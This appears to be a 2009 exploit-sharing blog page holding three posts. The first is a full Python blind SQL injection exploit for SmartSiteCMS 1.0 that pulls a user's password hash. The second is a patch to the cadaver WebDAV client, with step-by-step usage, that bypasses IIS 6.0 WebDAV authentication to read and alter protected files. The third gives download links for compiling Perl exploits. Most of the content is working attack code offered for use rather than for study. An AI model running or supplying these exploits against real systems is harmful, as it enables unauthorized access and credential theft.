SmartSiteCMS 1.0 (articles.php var) Blind SQL Injection Exploit
#!/usr/bin/python
import sys
import re
from socket import *
class exploit:
def __init__(self,host,path,user):
self.host=host
self.path=path
self.user=user
self.reg=re.compile("")
def set_query(self,n,ch):
self.query="' OR ASCII(SUBSTRING((SELECT password FROM users WHERE userName='"+self.user+"'),"+str(n)+",1)) = "+str(ord(ch))+" OR '1'='2"
self.query = self.query.replace(" ","%20")
self.query = self.query.replace("'","%27")
self.request="GET "+self.path+"/articles.php?var="+self.query+" HTTP/1.0\r\nHost: "+self.host+"\r\n\n"
def check(self):
sock=socket(AF_INET, SOCK_STREAM)
sock.connect((self.host, 80))
sock.send(self.request)
r=""
t="-"
while(t!=""):
t=sock.recv(1024)
r+=t
match=self.reg.search(r)
if(r[match.start()+27:match.start()+59]!=""):
return 1
else:
return 0
sock.close()
print "////*****************************************\\\\\\\\"
print "|||| smartSiteCMS 1.0 v1.0 ||||"
print "|||| Blind SQL injection ||||"
print "|||| ||||"
print "|||| ~Author: certaindeath ||||"
print "|||| ~Greetz: darkjoker ||||"
print "\\\\\\\\************************************* ****////\n"
if(len(sys.argv) !=4 ):
print "Usage: python xpl.py
print "Example: python xpl.py localhost /cms admin"
sys.exit(0)
pwd=""
xpl = exploit(sys.argv[1],sys.argv[2],sys.argv[3])
n=1
while(n<=32):
t=0
xpl.set_query(n,str(t))
while (xpl.check()!=1):
t+=1
xpl.set_query(n,str(hex(t))[-1])
pwd+=str(hex(t))[-1]
n+=1
print "pass [md5]: ",pwd
SmartSiteCMS 1.0 (articles.php var) Blind SQL Injection Exploit
Posted at Saturday, July 11, 2009Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)
Posted at Saturday, July 11, 2009Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)
# Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
#
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# --snip--
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# --snip--
# > tar xzvf cadaver-0.23.2.tar.gz
# --snip--
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch
# patching file lib/neon/ne_basic.c
# patching file lib/neon/ne_request.c
# patching file lib/neon/ne_uri.c
# > ./configure
# --snip--
# > make
# --snip--
#
# Now we should have a patched, compiled version of cadaver, so start it
# up with the server that was identified as having a vulnerable folder
# earlier:
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a “dav:/>” prompt. Now just cd into the
# vulnerable folder and check out what’s there:
#
# dav:/> cd secret
# dav:/secret/> ls
# Listing collection `/secret/': succeeded.
# password.txt 7 May 19 10:40
# dav:/secret/> cat password.txt
# Displaying `/secret/password.txt':
# ron$pr0ns
# dav:/secret/>
#
# Here’s a list of commands that I’ve tested that work with the patched
# cadaver on a vulnerable folder:
# * CD
# * LS
# * MOVE
# * PUT
# * GET
# * CAT
# * DELETE
Quote:
diff -rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c
--- cadaver-0.23.2/lib/neon/ne_basic.c 2008-02-07 16:22:07.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_basic.c 2009-05-20 16:13:46.000000000 -0500
@@ -402,7 +402,7 @@
value = "infinity";
break;
}
- ne_add_request_header(req, "Depth", value);
+ ne_add_request_header(req, "Depth", "1");
}
static int copy_or_move(ne_session *sess, int is_move, int overwrite,
diff -rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c
--- cadaver-0.23.2/lib/neon/ne_request.c 2008-01-30 05:35:52.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_request.c 2009-05-20 16:35:46.000000000 -0500
@@ -405,6 +405,7 @@
"Connection: TE" EOL
"TE: trailers" EOL);
}
+ ne_buffer_czappend(req->headers, "Translate: f" EOL);
}
int ne_accept_always(void *userdata, ne_request *req, const ne_status *st)
@@ -420,6 +421,7 @@
ne_request *ne_request_create(ne_session *sess,
const char *method, const char *path)
{
+ char *path2 = ne_calloc(strlen(path)+7);
ne_request *req = ne_calloc(sizeof *req);
req->session = sess;
@@ -435,13 +437,18 @@
req->method = ne_strdup(method);
req->method_is_head = (strcmp(method, "HEAD") == 0);
+ if(strlen(path)>2)
+ sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);
+ else
+ path2 = path;
+
/* Only use an absoluteURI here when absolutely necessary: some
* servers can't parse them. */
- if (req->session->use_proxy && !req->session->use_ssl && path[0] == '/')
+ if (req->session->use_proxy && !req->session->use_ssl && path2[0] == '/')
req->uri = ne_concat(req->session->scheme, "://",
- req->session->server.hostport, path, NULL);
+ req->session->server.hostport, path2, NULL);
else
- req->uri = ne_strdup(path);
+ req->uri = ne_strdup(path2);
{
struct hook *hk;
diff -rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c
--- cadaver-0.23.2/lib/neon/ne_uri.c 2007-12-05 05:04:47.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_uri.c 2009-05-20 16:13:46.000000000 -0500
@@ -96,7 +96,7 @@
/* 0xXX x0 x2 x4 x6 x8 xA xC xE */
/* 0x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
/* 1x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
-/* 2x */ OT, SD, OT, GD, SD, PC, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
+/* 2x */ OT, SD, OT, GD, SD, AL, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
/* 3x */ DG, DG, DG, DG, DG, DG, DG, DG, DG, DG, CL, SD, OT, SD, OT, QU,
/* 4x */ AT, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL,
/* 5x */ AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, GD, OT, GD, OT, US,
Watch Video: IIS WebDAV Vulnerability in Action
Compiling Perl coded exploits
Posted at Saturday, July 11, 2009Compiling Perl coded exploits
Active Perl
Features
Complete ActivePerl Package
* Perl
Binary of core Perl distribution
* Perl Package Manager
ActiveState's Perl extension installer and manager; allows for easy installation and management of modules and extensions
* Installers
A variety of installers are available for quick installation of ActivePerl:
o AIX: ActiveState installer packages
o HP-UX: ActiveState installer packages
o Linux: Redhat, Debian and ActiveState installer packages
o Mac OS X: Disk image containing the installer package
o Solaris: Sun and ActiveState installer packages
o Windows: Mcft Windows (MSI) and ActiveState installer packages
* Complete online documentation
Windows Version Extras
* Perl for ISAPI
IIS plug-in to enhance the speed of standard Perl
* PerlScript
ActiveX scripting engine, like JavaScript or VBScript with a Perl brain
* PerlEz
Embedded Perl
Code:
http://downloads.activestate.com/Act...x86-148120.msi
OR
visit
Code:
http://downloads.activestate.com/Act...l/Windows/5.8/
for previous versions..
****************** not reccomended ************************
Perl2Exe
Perl2Exe is a command line program for converting perl scripts to executable files.
This allows you to create stand alone programs in perl that do not require the perl interpreter. You can ship the executable files without having to ship your perl source code.
Perl2Exe can generate executables for Windows and Unix target hosts.
Perl2Exe can generate cross-platform code. For example you can generate code for Solaris from a Linux machine.
Perl2Exe also allows you to create no-console programs using Tk.
Download Perl2Exe for Win32 V8.60
Code:
http://www.indigostar.com/download/p2x-8.60-Win32.zip
(win 32)
Instruction Manual:
Code:
http://www.indigostar.com/pxman.htm
